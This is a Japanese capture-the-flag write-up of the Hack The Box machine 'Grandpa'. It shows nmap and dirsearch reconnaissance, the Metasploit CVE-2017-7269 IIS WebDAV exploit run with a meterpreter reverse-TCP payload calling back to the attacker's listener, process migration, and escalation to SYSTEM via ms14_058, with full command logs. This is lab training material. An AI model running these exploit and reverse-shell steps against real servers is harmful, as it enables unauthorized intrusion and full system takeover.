まえがき
この記事はGrandpaのWriteupになっています📝
髪の毛がちょっとさみしいおじいさんを攻略していきます。
Machine Info
Name: Grandpa
IP Address: 10.10.10.14
OS: Windows 🪟
Recon
Port Scan - Nmap
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap 10.10.10.14 -Pn -v -A --script=vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 20:05 JST
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:05
NSE Timing: About 44.44% done; ETC: 20:06 (0:00:40 remaining)
Completed NSE at 20:05, 34.32s elapsed
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Initiating Parallel DNS resolution of 1 host. at 20:05
Completed Parallel DNS resolution of 1 host. at 20:05, 0.12s elapsed
Initiating SYN Stealth Scan at 20:05
Scanning 10.10.10.14 [1000 ports]
Discovered open port 80/tcp on 10.10.10.14
Completed SYN Stealth Scan at 20:06, 19.78s elapsed (1000 total ports)
Initiating Service scan at 20:06
Scanning 1 service on 10.10.10.14
Completed Service scan at 20:06, 6.76s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.14
Retrying OS detection (try #2) against 10.10.10.14
Initiating Traceroute at 20:06
Completed Traceroute at 20:06, 0.28s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:06
Completed Parallel DNS resolution of 2 hosts. at 20:06, 0.04s elapsed
NSE: Script scanning 10.10.10.14.
Initiating NSE at 20:06
Completed NSE at 20:19, 793.54s elapsed
Initiating NSE at 20:19
Completed NSE at 20:19, 4.99s elapsed
Nmap scan report for 10.10.10.14
Host is up (0.26s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
| vulners:
| cpe:/a:microsoft:internet_information_services:6.0:
| PACKETSTORM:93313 6.0 https://vulners.com/packetstorm/PACKETSTORM:93313 *EXPLOIT*
| CVE-2009-4445 6.0 https://vulners.com/cve/CVE-2009-4445
|_ CVE-2009-4444 6.0 https://vulners.com/cve/CVE-2009-4444
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-server-header: Microsoft-IIS/6.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-iis-webdav-vuln: WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=<path>
| http-enum:
| /postinfo.html: Frontpage file or folder
| /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
| /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
| /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
| /_vti_bin/shtml.dll: Frontpage file or folder
|_ /_vti_bin/shtml.exe: Frontpage file or folder
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003 (92%)
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp1:professional cpe:/o:microsoft:windows_server_2003::sp1
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (92%), Microsoft Windows Server 2003 SP1 (91%), Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (88%), Microsoft Windows 2000 SP4 (88%), Microsoft Windows XP SP2 or SP3 (88%), Microsoft Windows XP SP3 (88%), Microsoft Windows 2000 SP1 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 261.36 ms 10.10.14.1
2 261.52 ms 10.10.10.14
NSE: Script Post-scanning.
Initiating NSE at 20:19
Completed NSE at 20:19, 0.00s elapsed
Initiating NSE at 20:19
Completed NSE at 20:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 868.75 seconds
Raw packets sent: 2082 (95.124KB) | Rcvd: 46 (2.792KB)
80番のポートのみ開いていることがわかる。
Site - http://10.10.10.14
実際にアクセスしてみるとこんなページが見つかる。
IISのデフォルトのスタート画面がでてきた。
Enumeration
他に見落としがないか確認していく。
dirsearch
┌──(root㉿kali)-[/home/kali/Desktop/work]
└─# dirsearch -u http://10.10.10.14
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/kali/Desktop/work/reports/http_10.10.10.14/_24-01-04_18-26-42.txt
Target: http://10.10.10.14/
[18:26:42] Starting:
[18:26:52] 403 - 32B - /%2e%2e//google.com
[18:26:53] 403 - 32B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[18:26:53] 404 - 1KB - /.asmx
[18:26:53] 404 - 1KB - /.axd
[18:26:53] 404 - 1KB - /.ashx
[18:27:13] 403 - 32B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[18:27:15] 403 - 1KB - /_private
[18:27:15] 403 - 1KB - /_private/
[18:27:15] 403 - 218B - /_vti_bin/
[18:27:15] 301 - 155B - /_vti_bin -> http://10.10.10.14/%5Fvti%5Fbin/
[18:27:15] 200 - 195B - /_vti_bin/_vti_adm/admin.dll
[18:27:15] 200 - 195B - /_vti_bin/_vti_aut/author.dll
[18:27:15] 403 - 1KB - /_vti_cnf
[18:27:15] 404 - 103B - /_vti_cnf/
[18:27:15] 500 - 112B - /_vti_pvt/administrator.pwd
[18:27:15] 500 - 112B - /_vti_pvt/
[18:27:15] 403 - 1KB - /_vti_pvt
[18:27:15] 500 - 112B - /_vti_pvt/administrators.pwd
[18:27:15] 200 - 2KB - /_vti_inf.html
[18:27:15] 500 - 88B - /_vti_pvt/users.pwd
[18:27:15] 500 - 88B - /_vti_pvt/service.pwd
[18:27:15] 403 - 1KB - /_vti_log
[18:27:15] 403 - 1KB - /_vti_log/
[18:27:15] 500 - 112B - /_vti_pvt/authors.pwd
[18:27:15] 200 - 96B - /_vti_bin/shtml.dll
[18:27:15] 500 - 88B - /_vti_pvt/service.pwt
[18:27:15] 500 - 88B - /_vti_pvt/shtml.exe
[18:27:15] 500 - 88B - /_vti_pvt/users.pwt
[18:27:15] 200 - 96B - /_vti_bin/shtml.exe?_vti_rpc
[18:27:15] 403 - 1KB - /_vti_txt/
[18:27:15] 403 - 1KB - /_vti_txt
[18:27:46] 403 - 218B - /aspnet_client
[18:27:46] 403 - 218B - /aspnet_client/
[18:27:55] 403 - 32B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[18:28:11] 404 - 1KB - /elmah.axd
[18:28:23] 301 - 149B - /images -> http://10.10.10.14/images/
[18:28:23] 403 - 218B - /images/
[18:28:56] 200 - 2KB - /postinfo.html
[18:29:05] 404 - 1KB - /service.asmx
[18:29:17] 404 - 1KB - /Telerik.Web.UI.WebResource.axd?type=rau
[18:29:21] 403 - 2KB - /Trace.axd
[18:29:22] 404 - 1KB - /umbraco/webservices/codeEditorSave.asmx
[18:29:31] 404 - 1KB - /WebResource.axd?d=LER8t9aS
Task Completed
うぉーいろいろ列挙してくれた。とりあえず 200 - Succsessのやつを調べていく。
/_vti_bin/_vti_adm/admin.dll
なんこれ。よくわからんけど、何かのログかな??
ちなみに /_vti_bin/_vti_aut/author.dll にもアクセスしてみるも同じであった。
/_vti_inf.html
あんまり関係なさそう。
/_vti_inf.html
/postinfo.html
あまり気になるようなページは見つからなかったため、別のアプローチをしていこう。
先ほどのNmapとhttp://10.10.10.14を見返してみると、Microsoft-IIS/6.0が使われていることがわかる。
Identification of Vulnerbility
Microsoft-IIS 6.0 vulnで調べてみよう。
CVE-2017-7269
WebDAV Mini-RedirectorというWindows環境でWebDAVプロトコルを使用してリモートでアクセスするためのコンポーネントのバッファオーバーフローの脆弱性だ。
悪意のあるHTTPリクエストを使うことで、攻撃者はWebDAV Mini-Redirectorの脆弱性を使用することができる。この攻撃ベクトルを使うことによって、攻撃者はペイロードを作って、WebDAVサービスに送ることができる。
このペイロードによって、ターゲットマシンのWebDAVサービスはサーバが期待するサイズを超えたデータを受け取り、未割り当てか不適切なメモリ領域に書き込みが発生する。
このバッファオーバーフローの結果、攻撃者はスタックメモリのオーバーランを引き起こすことができる。関数のリターンアドレスや重要な制御データを上書きすることで、悪意のあるコードの実行経路確立につながるのだ。
Exploit the Vulnerbility
metasploit
└─$ msfconsole
Metasploit tip: View all productivity tips with the tips command
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.3.43-dev ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search CVE-2017-7269
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
CVEで検索をかけると、よさげなモジュールを発見できる。使っていこう。
show optionsで設定が必要な箇所を確認しながら、設定をしていこう。
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute for
ce
MINPATHLENGTH 3 yes Start of physical path brute f
orce
Proxies no A proxy chain of format type:h
ost:port[,type:host:port][...]
RHOSTS yes The target host(s), see https:
//docs.metasploit.com/docs/usi
ng-metasploit/basics/using-met
asploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing
connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST 192.168.236.128 yes The listen address (an interface ma
y be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.4
lhost => 10.10.14.4
実行。
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.14:1030) at 2024-01-04 20:28:05 +0900
meterpreter >
成功したようですね。
今回はSystemをとってからUserとAdminが同時にアクセス可能になるので、
さっそく権限昇格フェーズに進んでいこう。
Privilege Escalation
backgroundにしてから、Multi Recon Local Exploit Suggesterを使って脆弱性を探索していこう。
Background session 1? [y/N] y
[-] Unknown command: y
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the
available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
設定完了。
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 188 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.14 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
7 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
8 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
9 exploit/windows/local/always_install_elevated No The target is not exploitable.
10 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
11 exploit/windows/local/bits_ntlm_token_impersonation No The check raised an exception.
12 exploit/windows/local/bthpan No The target is not exploitable.
13 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
14 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
15 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
16 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
17 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows!
18 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
19 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
20 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
21 exploit/windows/local/ikeext_service No The check raised an exception.
22 exploit/windows/local/ipass_launch_app No The check raised an exception.
23 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
24 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
25 exploit/windows/local/mqac_write No The target is not exploitable.
26 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
27 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
28 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
29 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
30 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception.
31 exploit/windows/local/ms16_075_reflection No The check raised an exception.
32 exploit/windows/local/ms16_075_reflection_juicy No The check raised an exception.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
39 exploit/windows/local/tokenmagic No The target is not exploitable.
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
上から6つまでが有効そうだ。試していこう。
だがしかし6つすべて試しても、このようにうまくいかなかったのではないだろうか?
[*] Started reverse TCP handler on 10.10.14.4:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
Process Migration
先ほどうまくいかなかった原因で考えられるのは、アーキテクチャの互換性の問題だ。
解決方法としてはプロセスを移行することだ。
原因を詳しく説明すると、例えば、32ビットのMeterpreterプロセスが64ビットのシステム上で64ビットのペイロードを実行しようとすると、アーキテクチャの違いによって失敗する可能性がある。
プロセスを移行することでより安定したプロセスに変更することや、より高い権限を持っていることもある。
そのため、別プロセスを移行してもう一度試すことにしよう。
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Proc
ess]
4 0 System
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
584 392 svchost.exe
656 1072 cidaemon.exe
668 392 svchost.exe
736 392 svchost.exe
768 392 svchost.exe
788 392 svchost.exe
924 392 spoolsv.exe
952 392 msdtc.exe
1072 392 cisvc.exe
1112 392 svchost.exe
1168 392 inetinfo.exe
1204 392 svchost.exe
1312 392 VGAuthServic
e.exe
1384 392 vmtoolsd.exe
1488 392 svchost.exe
1592 392 svchost.exe
1664 1072 cidaemon.exe
1772 392 dllhost.exe
1936 392 alg.exe
1964 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK C:\WINDOWS\system32\w
SERVICE bem\wmiprvse.exe
2092 1072 cidaemon.exe
2256 584 wmiprvse.exe
2604 1488 w3wp.exe x86 0 NT AUTHORITY\NETWORK c:\windows\system32\i
SERVICE netsrv\w3wp.exe
2740 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK C:\WINDOWS\system32\i
SERVICE netsrv\davcdata.exe
3060 344 logon.scr
3376 2604 rundll32.exe x86 0 C:\WINDOWS\system32\r
undll32.exe
プロセス移行はmigrateコマンドでできる。
meterpreter > migrate 2604
[*] Migrating from 3376 to 2604...
[*] Migration completed successfully.
もう一度これで実行してみよう。
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.12:4444
[*] Reflectively injecting the exploit DLL and triggering the exploit...
[*] Launching netsh to host the DLL...
[+] Process 1260 launched.
[*] Reflectively injecting the DLL into 1260...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.12:4444 -> 10.10.10.14:1031) at 2024-01-08 17:18:09 +0900
meterpreter >
うおおぉぉお!いけた。権限昇格もnt authority\systemとの表示から成功。
meterpreter > shell
Process 2344 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\system
Documents and SettingsのところにAdministratorとHarryがみつかる。
c:\windows\system32\inetsrv>cd c:\
cd c:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\
04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 04:32 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:18 PM <DIR> Program Files
09/16/2021 11:52 AM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 1,317,928,960 bytes free
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:12 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 04:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 1,317,994,496 bytes free
Administrator
C:\Documents and Settings>cd Administrator
cd Administrator
C:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Administrator
04/12/2017 04:12 PM <DIR> .
04/12/2017 04:12 PM <DIR> ..
04/12/2017 04:28 PM <DIR> Desktop
04/12/2017 04:12 PM <DIR> Favorites
04/12/2017 04:12 PM <DIR> My Documents
04/12/2017 03:42 PM <DIR> Start Menu
04/12/2017 03:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 1,317,842,944 bytes free
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 04:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 1,317,838,848 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のRootFlag
Harry
C:\Documents and Settings>cd Harry
cd Harry
C:\Documents and Settings\Harry>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Harry
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:32 PM <DIR> Desktop
04/12/2017 04:32 PM <DIR> Favorites
04/12/2017 04:32 PM <DIR> My Documents
04/12/2017 03:42 PM <DIR> Start Menu
04/12/2017 03:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 1,317,834,752 bytes free
C:\Documents and Settings\Harry>cd Desktop
cd Desktop
C:\Documents and Settings\Harry\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\Documents and Settings\Harry\Desktop
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:32 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 1,317,834,752 bytes free
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX //32文字のUserFlag
どちらもゲット。
あとがき
今回もMetasploitの使い方の復習になったのではないでしょうか。また、プロセスのマージ方法についても学べる良いマシンです。ちなみに、Grannyというboxも同じ手法で攻略することが可能です。
復習がてら、おばあちゃんも攻略しちゃいましょう!
